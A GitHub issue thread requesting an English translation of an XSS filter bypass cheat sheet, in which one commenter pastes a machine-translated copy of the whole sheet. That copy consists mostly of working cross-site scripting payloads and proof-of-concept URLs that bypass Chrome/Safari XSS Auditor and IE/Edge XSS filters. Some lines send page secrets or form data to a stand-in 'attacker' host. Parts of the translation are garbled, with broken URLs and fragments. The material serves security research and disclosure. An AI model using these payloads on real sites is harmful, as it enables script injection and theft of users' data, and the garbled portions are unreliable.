Open qazbnm456 opened 7 years ago
masatokinugawa
commented
7 years ago Hi @qazbnm456! I am thinking that I want to provide English version, but I couldn't make time so far :(
Hi @Auxy233! Please feel free to translate my cheatsheet. It's up to you, but if you can send me the English version (via the pull request?), I'll merge it and add proper credit. Thanks!
qazbnm456
commented
7 years ago Thank you for your consideration and help, @masatokinugawa and @Auxy233. I'm looking forward to it. 😄
qazbnm456
commented
7 years ago @Auxy233 Nice, I can't wait to see it. Really appreciate. 👍
qazbnm456
commented
6 years ago @Auxy233 Sorry for bothering again, but is there any progress I can follow up? Still awaiting your kind work patiently.
jcubic
commented
6 years ago Any progress?
EdOverflow
commented
6 years ago Just use Google Translate for the time being. @masatokinugawa does a good job at describing the conditions and I was easily able to reproduce the bypasses.
w1redch4d
commented
1 year ago here is an google translated markdown for yall, who needs it :
This page summarizes XSS Auditor and XSS filter bypass. Content that runs on the latest versions of Chrome/Safari and IE11/Edge is eligible. If you're a vulnerability diagnostician, let us help you convincingly prove that an attack is possible, and if you're a security researcher, help us find more bypasses. What I'm listing is what can be bypassed in common situations. Just because a method isn't listed here doesn't mean it can't be abused in real-world situations. Regardless of whether it can be bypassed or not, it's always a good idea to do some underlying XSS mitigation.
document.write() the request string--> in script tags (Safari only)document.write() (Chrome only)<?PXML> (IE only)In contexts where protection is not provided in the first place, scripts can be executed without special manipulation.
https://vulnerabledoma.in/bypass/str_literal?q=%22%3Balert(1)//
<script>var q="";alert(1)//"</script>https://vulnerabledoma.in/bypass/link?q=javascript:alert(1)
<a href="javascript:alert(1)">Link</a>(Although it appears to be able to screen out a significant number of cases occurring with more than one, previously reported cases ( [#96616](https://bugs.chromium.org/p/chromium/issues/detail?id =96616) #403636 ) is WontFix, so it is classified as not to be blocked.)
https://vulnerabledoma.in/bypass/text?type=2&q=%60-alert(1)%3C/script%3E%3Cscript%3E%60
<div>`-alert(1)</script><script>`</div>
<div>`-alert(1)</script><script>`</div>When some strings are removed or replaced, intervening strings do not block.
https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E
<svg o<script>nload=alert(1)>
↓
<svg onload=alert(1)>https://vulnerabledoma.in/bypass/text?type=7&q=%3Cscript%3E/%26/-alert(1)%3C/script%3E
<script>/&/-alert(1)</script>
↓
<script>/&/-alert(1)</script>document.write() the request stringhttps://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E
<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)
<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script><?xml version="1.0"?><html><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script></html>Bypass also occurs when a string can be written from the top of the page, Content-Type is not specified correctly, and XML is selected by Content Sniffing.
https://vulnerabledoma.in/bypass/text?mime=unknown&q=%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml% 22%3Ealert(1)%3C/script%3E
<?xml version="1.0"?><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>Anything less than this does not lead to script execution, but is allowed to be written and has the potential to be used for attacks to some extent.
<a href=https://attacker/>Session expired. Please login again.</a>It is sometimes possible to include confidential information in requests such as images, for example by using open quotes.
https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=
<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>In addition to disguising the appearance of the page, if the same page contains sensitive information, it may be possible to retrieve the information using only CSS. See URL for details.
Reference URL:
https://vulnerabledoma.in/bypass/text?q=%3Cstyle%3E@import%20%27//attacker/test.css%27%3C/style%3E
<style>@import '//attacker/test.css'</style>https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=stylesheet%20href=//attacker/test.css%3E
<link rel=stylesheet href=//attacker/test.css>Conditions for attacking:
Reference URL:
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Csvg%20xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Canimate%20xlink:href=%23x%20attributeName=%22xlink :href%22%20values=%22%26%23x3000%3Bjavascript:alert(1)%22%20/%3E%3Ca%20id=x%3E%3Crect%20width=100%20height=100%20/%3E %3C/a%3E
<svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName="xlink:href" values=" javascript:alert(1)"/ ><a id=x><rect width=100 height=100 /></a>Conditions for attacking:
Reference URL:
PoCs:
https://vulnerabledoma.in/bypass/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C/script%3E
[0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>--> in script tags (Safari only)Conditions for attacking:
Reference URL:
PoCs:
https://vulnerabledoma.in/bypass/text?type=9&q=%3Cscript%3Ealert(1)%0A--%3E
<div><script>alert(1)
--></div><script src=/test.js></script>Conditions for attacking:
'" after itReference URL:
PoCs:
(if there is no space immediately after) https://vulnerabledoma.in/bypass/text?type=3&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=//l0.cm /
<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>(If there is a white space immediately after) https://vulnerabledoma.in/bypass/text?type=4&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=%22//l0 .cm/
<div> <embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/ </div><div id="x"></div>Conditions for attacking:
'" after itPoCs:
https://vulnerabledoma.in/bypass/text?type=9&q=%3Cbase%20href=//cors.l0.cm/
<div><base href=//cors.l0.cm/</div><script src=/test.js></script>Conditions for attacking:
supplement:
In the ISO-2022-JP HTML, the byte strings [0x1B](B, [0x1B](H, [0x1B](J are ignored. Insert this between the reaction strings Also, in Chrome/Safari, a byte string such as [0x1B]$@[0x0A] is treated the same as [0x0A], but the XSS Auditor cannot interpret it well and bypasses it.
Reference URL:
PoCs:
<meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>(*Because the $ sign is arbitrarily encoded and does not work as intended, the redirect is sandwiched by a method that includes a $.)
<meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>XSS Auditor does not block loading same-domain resources that do not have queries. Bypassing is possible in some cases if the resources necessary for an attack can be placed in the same domain.
Conditions for attacking:
PoCs:
PATH_INFO:/<link rel=import href="/bypass/path/<script>alert(1)</script>">Conditions for attacking:
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=/bypass/usercontent/xss.js%3E%3C/script%3E
<script src=/bypass/usercontent/xss.js></script>(Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/usercontent/icon.jpg%3E
<link rel=import href=/bypass/usercontent/icon.jpg>flashvarsConditions for attacking:
ExnternalInterface.call()supplement:
By using the flashvars attribute, you can pass parameters without having to pass Flash parameters directly to the query. (= On the Flash side, even if passing parameters from the URL is restricted as a countermeasure against XSS by opening Flash directly, it can be passed with flashvars.) In addition, `Content-Security-Policy: default-src It can also be used to bypass CSP, such as when there is a CSP like 'self'.
PoCs:
<embed name=a flashvars='autoplay=true&file="})\")-(alert=alert(1)))}catch(e){}//' allowscriptaccess=always src=//vulnerabledoma.in/bypass /wp-includes/js/mediaelement/flashmediaelement.swf>ActionScript:
ExternalInterface.call("setTimeout", ExternalInterface.objectID + '_event' + "('" + eventName + "'," + eventValues + ")", 0);ExternalInterface.objectID and ExternalInterface.call() in FlashConditions for attacking:
ExternalInterface.objectID is passed to ExternalInterface.call()supplement:
ExternalInterface.objectID is a property that sets the value of the name attribute of the tag used for embedding, and although it cannot be XSSed by itself, it can be used only for bypassing. It can also be used to bypass CSP when there are CSP restrictions such as Content-Security-Policy: default-src 'self'.
PoCs:
https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=%27alert(1)-%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/ mediaelement/flashmediaelement.swf%3E
<embed name='alert(1)-' allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>ActionScript:
ExternalInterface.call(ExternalInterface.objectID + '_init');Conditions for attacking:
supplement:
Angular will try to expand the template enclosed in {{}} inside the tag with the attribute ng-app. Templates can run scripts.
Reference URL:
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=%22/js/angular1.6.4.min.js%22%3E%3C/script%3E%3Cp%20ng-app%3E{ {constructor.constructor(%27alert(1)%27)()}}
<script src="/js/angular1.6.4.min.js"></script><p ng-app>{{constructor.constructor('alert(1)')()}}If you have a page on the same origin that loads Angular from a CORS-enabled CDN, you can load resources from external origins by indirectly loading them from HTML Imports.
(Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1) )%27)()}}
<link rel=import href=angular.html><p ng-app>{{constructor.constructor('alert(1)')()}}Conditions for attacking:
PoCs:
(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/vue.html%3E%3Cdiv%20id=app%3E{{constructor. constructor(%27alert(1)%27)()}}
<link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor('alert(1)')()}}Conditions for attacking:
supplement:
jQuery additional functions are after,before,prepend,append,html,replaceWith,wrap,wrapAll,insertBefore,insertAfter,prependTo Things like,appendTo. By using a form component with a name attribute of ownerDocument, the reference destination of Node.ownerDocument is misleading. , the script is executed when it should not be executed. -scream/21)). In addition, there is a process to remove <!-- in the script block before execution, combined with the fact that Auditor does not intercept script blocks that contain only comments, causes the bypass.
Reference URL:
PoCs:
<!DOCTYPE html>
<html>
<head>
<script src="/js/jquery-3.2.1.min.js"></script>
<script>
$(document).ready(function(){
// code taken from http://api.jquery.com/after/
$( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
<!-- XSS -->
<form class=child><input name=ownerDocument><script><!--alert(1)</script></form>
<!-- XSS -->
<p class="container"></p>
</body>
<!-- Inspired by @sirdarckcat CSP bypass trick: https://sirdarckcat.github.io/csp/jquery.html -->
</html>(This example is Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/jquery.html%3E%3Cp%20class=container%3E%3C/p %3E%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script%3E%3C/form%3E
<link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><!--alert(1)</script ></form>Conditions for attacking:
PoCs:
(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/underscore.html%3E%3Cscript%20id=template%3E//%3C %alert1%%3E%3C/script%3E
<link rel=import href=/bypass/underscore.html><script id=template>//<%alert`1`%></script>Conditions for attacking:
supplement:
Take advantage of the conversion script parsing SVG script blocks in the same way as HTML script blocks. The comment part between <!-- and -->, which is not normally executed, is evaluated as a script.
PoCs:
(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?charset=utf-8&type=1&q=%3Clink%20rel=import%20href=/bypass/babel-standalone.html%3E%3Csvg%3E %3Cscript%20type=%22text/jsx%22%3E//%3C!--%0aalert(1)//--%3E%3C/svg%3E%3Cscript%3E0%3C/script%3E
<link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<!--
alert(1)//--></svg><script>0</script>document.write() (Chrome only)Conditions for attacking:
document.write() the URLdocument.write() (in the case of the PoC below, </body> is used as the closing tag)Reference URL:
PoCs:
https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)//
<body>
<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>
</body>Conditions for attacking:
Reference URL:
PoCs:
(if you are inside a form) https://vulnerabledoma.in/bypass/form?q=%22%3E%3C/form%3E%3Cform%20action=https://attacker/
<form action="form">
<input type="hidden" name="q" value=""></form><form action=https://attacker/">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>(when outside the form) https://vulnerabledoma.in/bypass/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https://attacker/
<div><button form=f>CLICK<form id=f action=https://attacker/</div>
<form action="form2">
<input type="hidden" name="secret" value="a09d3ef0">
</form>Posted in Fixed Bypass Archive.
supplement:
Previously there was a blocking condition for string literals. Although it still partially remains, assignment to location, which was blocked before, is clearly attackable, etc. is allowed, and there is almost no protection. It doesn't look like it's going to provide protection any more, so I've categorized it as non-blocking rather than bypass.
https://vulnerabledoma.in/bypass/str_literal?q=%22%3Blocation='javascript\x3Aalert\x281\x29'//
<script>var q="";location='javascript\x3Aalert\x281\x29'//"</script>https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)%3E
<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E
<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)
<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script><div>"src=data:,alert%281%29></script><script x="</div>
<div>"src=data:,alert%281%29></script><script x="</div>When some strings are removed or replaced, intervening strings do not block.
https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E
<svg o<script>nload=alert(1)>
↓
<svg onload=alert(1)>At the position represented by . in the regular expression of the filter, more than Can no longer be blocked if a replacement is made.
In the following case, to avoid matching the cut-off condition <sc{r}ipt.*?>, the behavior of & being replaced excessively is used. / is a wildcard of 0-3 characters and & is a wildcard of 0-5 characters, so the maximum width that can be cut off is 8 characters. The string length of /&amp; in the output after replacement is 10 characters, which exceeds the width of 8 characters, so it cannot be cut off.
PoCs:
https://vulnerabledoma.in/bypass/text?type=10&q=%3Cscript/%26%3Ealert(1)%3C/script%3E
<script/&>alert(1)</script>
↓
<script/&amp;>alert(1)</script>Anything less than this does not lead to script execution, but is allowed to be written and has the potential to be used for attacks to some extent.
It is sometimes possible to include confidential information in requests such as images, for example by using open quotes.
https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=
<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>Conditions for attacking:
X-XSS-Protection:1; mode-block headersupplement:
Edge will also try to block tags with an XML namespace. If a character string such as <embed/:script is used in normal HTML, it will be interpreted as a script tag when it should be interpreted as an embed tag, and blocking will fail. Since the blocking action has happened, the bypass will fail if the X-XSS-Protection:1; mode-block header is present.
Reference URL:
PoCs:
<embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>Conditions for attacking:
Content-Type headerReference URL:
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a
<x~
onfocus=alert(1) id=a tabindex=0>Conditions for attacking:
supplement:
During navigation, IE/Edge encodes the query string with the character code of the page before navigation and sends the request. At this time, the XSS filter was (presumably) checking the encoded string itself, not the request being sent, which could cause a mismatch between the encoded string and the bytes actually sent. Bypass occurs when
A specific example is shown with the character code x-chinese-cns used in the PoC below. In x-chinese-cns the character 旡 is mapped to 0xA13E. At this time, a query <script/旡 containing this string is sent from a page that has x-chinese-cns set as the character code of the page, attached to a parameter with reflective XSS. Then, the request to be sent is not the UTF-8 representation of 旡, but the byte itself encoded in x-chinese-cns </script/0xA1> (0x3E is >). , a <script> tag is written in the page. Normally, if you write a <script> tag, the XSS filter should work, but it doesn't work here. The reason for this is presumed that the filter mistakenly saw the string <script/旡 and did not match the blocking condition <sc{r}ipt.*?>.
Reference URL:
PoCs:
<meta charset=utf-8>
<script>
document.charset="x-chinese-cns";
location="https://vulnerabledoma.in/bypass/text?q=<script/旡alert(1)<\/script/"
</script>(For XSS with attribute value only) https://l0.cm/bypass/ie_x-chinese-cns_attribute.html
<meta charset=utf-8>
<script>
document.charset="x-chinese-cns";
location="https://vulnerabledoma.in/bypass/attribute?q=乜onmouseover=alert(1)//"
</script>As with other character codes, a mismatch between the encoded string and the bytes actually sent can be bypassed.
(The following is reproduced in an environment where the system locale is Japanese, but it was not reproduced in an environment with a German language. It seems that the operating principle is slightly different from other vectors, but I do not know the clear principle.For reference published in.)
Conditions for attacking:
Reference URL:
PoCs:
https://l0.cm/bypass/ie_postxss_bypass.pdf
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 20R
/Pages 3 0R
/Open Action 33 0 R
/AcroForm 220R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Annot [230R]
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 56 >>
streams
BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
33 0 obj
<<
/S /SubmitForm
/F
<<
%URL TO SUBMIT TO:
/F (https://vulnerabledoma.in/bypass/text)
/FS /URL
>>
% SPECIFIES THE FORMAT AND OTHER FORM RELATED CONFIGURATION
/Flags 6
>>
endobj
22 0 obj
<<
/Fields[23 0R]
>>
endobj
23 0 obj
<<
/DA (/Helv 12 Tf 0g)
/F4
/FT /Tx
/Rect [ 9.526760 680.078003 297.527008 702.078003 ]
/Subtype /Widget
/Type /Annot
% PARAMETER NAME
/T (q)
% PARAMETER PAYLOAD
/V (<script>alert\(1\)</script>)
/P40R
>>
endobj
trailer
<<
/Root 1 0 R
>>Conditions for attacking:
X-Content-Type-Options:nosniffReference URL:
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3C?xml%20version=%221.0%22?%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/ xhtml%22%3Ealert%281%26%23x29%3B%3C/x:script%3E
<?xml version="1.0"?><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>Conditions for attacking:
+, /, and - are allowedsupplement:
+/v8, +/v9, +/v+, +/v/ are UTF-7 [BOM](https://ja.wikipedia.org/wiki/%E3%83% 90%E3%82%A4%E3%83%88%E3%82%AA%E3%83%BC%E3%83%80%E3%83%BC%E3%83%9E%E3%83%BC% E3%82%AF). In IE, if this string appears at the top of the page, the character code of the page is assumed to be UTF-7.
Even if the character code is specified in the page, if the page is reopened via history.back(), the character code of that page will be treated as UTF-7. (Although the latter behavior was reported to Microsoft in July 2013, no changes have been made to date.)
PoCs:
(If there is no character code specified on the page) https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(1)%2BADw-/script%2BAD4-
+/v8-+ADw-script+AD4-alert(1)+ADw-/script+AD4-(If the page has character code specification) https://l0.cm/bypass/ie_utf7.html
<script>
function go(){
window.open("https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(location)%2BADw-/script%2BAD4-&charset=utf-8", "a");
setTimeout(function(){window.open("https://l0.cm/h_back.html","a")},1000);
}
</script>
<button onclick=go()>go</button><?PXML> (IE only)Conditions for attacking:
< do not appear before the injection pointReference URL:
PoCs:
<?PXML><html:script>alert(1)</html:script>https://vulnerabledoma.in/bypass/text?q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9
<PXML><html:script>alert(1)</html:script>IE/Edge's XSS filter does not work in cases with a Referer header from the same domain (including subdomains) or localhost. Bypassing is possible if such a referrer can be attached.
Conditions for attacking:
PoCs:
<a href="https://vulnerabledoma.in/bypass/text?q=<script>alert(1)</script>">Click HERE</a>Conditions for attacking:
supplement:
By double linking the vulnerable part and adding a referrer, you can create a link to a javascript: URL without triggering the XSS filter.
PoCs:
https://vulnerabledoma.in/bypass/link?q=?q=javascript%253Aalert(1)
<a href="?q=javascript%3Aalert(1)">Link</a>Conditions for attacking:
PoCs:
<form action="form">
<input type="hidden" name="q" value=""><script>alert(1)</script>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>Conditions for attacking:
Reference URL:
PoCs:
<form action=submit>
<button formaction=form3>CLICK<select name=q><option><script>alert(1)</script>
</form>Conditions for attacking:
supplement:
Creating an empty iframe with XSS and navigating a scripted URL to that frame causes a bypass due to the referrer of the vulnerable domain itself.
Reference URL:
PoCs:
https://l0.cm/bypass/ieedge_iframe.html
<!-- Found by @magicmac2000 -->
<iframe onload="contentWindow[0].location='//vulnerabledoma.in/bypass/text?q=<script>alert(location)</script>'" src="//vulnerabledoma.in/bypass/text ?q=%3Ciframe%3E"></iframe>Conditions for attacking:
PoCs:
https://vulnerabledoma.in/bypass/form?q=%22%3E%3Cbutton%20formaction=//attacker/%3E
<form action="form">
<input type="hidden" name="q" value=""><button formaction=//attacker/>">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>Conditions for attacking:
supplement:
Entity reference notation such as @, :, \,( that are part of the reaction string is not considered, so style blocks and attributes in SVG where entity reference notation is allowed Bypass occurs in value.
In IE, not only attacks that read information with CSS, but in some cases scripts can be executed via behavior:url().
Reference URL:
PoCs:
<svg><style>@import'//attacker'</style><svg><style>@\0069mport'//attacker'</style>(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior%26colon%3Burl('/bypass/usercontent/xss.txt')"%3Etest&xuac=10
<p style="behavior:url('/bypass/usercontent/xss.txt')">(IE+IE10 mode only) https://vulnerabledoma.in/bypass/text?q=%3Cp%20style="behavior:url%26lpar%3B'/bypass/usercontent/xss.txt')"%3Etest&xuac=10
<p style="behavior:url('/bypass/usercontent/xss.txt')">Published on Fixed Bypass Archive.
jcubic
commented
1 year ago @w1redch4d I don't think that adding it as a comment to an issue is really helpful. But thanks for the effort anyway. I hope that it will help those that don't know what Google Translate is and how to use it.
Hi @masatokinugawa, thanks for your sharing. It's pretty neat! However, I just want to know do you have any plan offering the English version as well? It would be great if we can have one. 😄